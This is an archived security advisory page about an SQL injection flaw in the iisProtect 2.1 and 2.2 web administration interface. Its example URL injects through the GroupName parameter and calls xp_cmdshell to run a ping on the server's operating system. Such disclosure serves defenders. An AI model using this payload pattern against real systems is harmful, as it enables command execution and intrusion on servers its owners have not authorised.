exploits , vulnerabilities , articles , IISProtect Web Administration Interface SQL Injection Vulnerability

Title	IISProtect Web Administration Interface SQL Injection Vulnerability
Published	2003-05-23-12:00AM
Updated	2003-05-23-10:07PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery is credited to Gyrniff <frohn@superbruger.dk>.
Vulnerable	iisProtect iisProtect 2.2 iisProtect iisProtect 2.1
Not Vulnerable
Code	The following example was provided: http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste r..xp_cmdshell'ping%2010.10.10.11';-- This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-04 Rae Media Web Based Contact Management Login SQL Injection Vulnerability
• 2008-12-04 Nagios External Commands and Adaptive Commands Unspecified Vulnerability
• 2008-12-04 Z1Exchange SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 mvnForum Cross Site Scripting Vulnerability
• 2008-12-04 i-Net Solution Orkut Clone SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
• 2008-12-04 Jbook SQL Injection Vulnerability
• 2008-12-04 SquirrelMail Malformed HTML Mail Message HTML Injection Vulnerability
• 2008-12-04 HP-UX Unspecified Local Denial Of Service Vulnerability
• 2008-12-04 Netrw Vim Script Information Disclosure Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 16:53:16 +0000